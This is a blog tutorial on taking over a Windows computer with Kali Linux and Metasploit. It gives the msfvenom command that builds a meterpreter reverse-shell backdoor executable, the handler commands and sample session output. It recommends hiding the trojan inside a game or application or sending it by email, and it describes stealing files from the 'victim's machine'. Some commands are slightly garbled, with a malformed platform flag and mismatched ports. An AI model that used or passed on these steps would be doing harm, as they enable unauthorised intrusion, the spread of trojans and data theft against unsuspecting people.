Hack a Computer on Your Network With Kali Linux Using The Metasploit

So you want to hack a computer and you've got Kali Linux installed?
If you don't have Click Here!

Step 1: Start Kali Linux

Open New Terminal

Create the PAYLOAD:


To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows.

Type This Command...

msfvenom -p windows/meterpreter/reverse_tcp - platform windows-a x86 -f exe -o /root/Desktop/back.exe

Step 2: Start the Metasploit Console

Start the Metasploit console by typing: msfconsole
This will take a few moments...



Follow by these Commands:


In Metasploit... Type these commands

use exploit/multi/handler


In above step we set our exploitation method. In this step we need to specify the payload that we have created.

Type set payload windows/meterpreter/reverse_tcp

set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)

set LPORT 4444

set RHOST *victim's ip*

set RPORT 445
Now  Exploit
msf exploit(handler) > exploit


Wait for the target to connect back


msf exploit(handler) > exploit

[*] Started reverse handler on "victims IP Like (192.158.1.104:444)"

[*] Starting the payload handler…



Execute the payload
Now you have to execute your trojan on the target system. Distributing the raw exe file is a bad idea, better encode it and attach with a normal application or a game or even email. once out trojan is in and executed a meterpreter session will be spawned.
Example like this ...
[*] Started reverse handler on 192.158.1.104:444
[*] Starting the payload handler…
[*] Sending stage (83170 bytes) to 192.158.1.105
[*] Meterpreter session 1 opened (192.158.1.104:444 -> 192.158.1.105:36028) at 2016-05-20 03:20:45 -0500
meterpreter > "help"

Meterpreter session allows you to execute system commands, networking commands, spy the screen and much more. use help command to see the whole list of commands.



Now you can do anything with victim's machine. You can shutdown, reboot victim's machine. You can steal files from that machine and upload files to that machine.  You can drop into system's shell. With that you can create a file on that machine, open a file, kill processes currently running on that machine and many more.






Comments

Popular posts from this blog

Using Kali Linux: Perform Website Cloning via SET toolkit

What is Log4j Vulnerability ?

How To Stop Becoming a Bait (A Cyber Security Methodology)